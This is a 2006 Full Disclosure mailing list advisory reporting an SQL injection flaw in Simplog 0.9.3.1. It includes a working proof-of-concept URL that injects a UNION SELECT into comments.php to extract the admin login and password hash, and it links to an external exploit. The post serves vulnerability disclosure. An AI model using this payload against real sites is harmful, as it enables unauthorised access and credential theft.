Full Disclosure mailing list archives
Simplog 0.9.3.1 SQL Injection
From: disfigure <disfigure () gmail com>
Date: Tue, 17 Oct 2006 21:50:48 -0500
/****************************************/ http://www.w4cking.com CREDIT: w4ck1ng.com PRODUCT: Simplog 0.9.3.1 http://www.simplog.org/ VULNERABILITY: SQL Injection NOTES: - SQL injection can be used to obtain password hash - requires at least one blog entry POC: <host>/<path>/comments.php?op=edit&cid=1%20union%20select%209,9,9,login,9,password,9,9%20from%20blog_users%20where%20admin=1 ADVISORY & EXPLOIT (requires registration): http://w4ck1ng.com/board/showthread.php?t=1511 /****************************************/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Simplog 0.9.3.1 SQL Injection disfigure (Oct 17)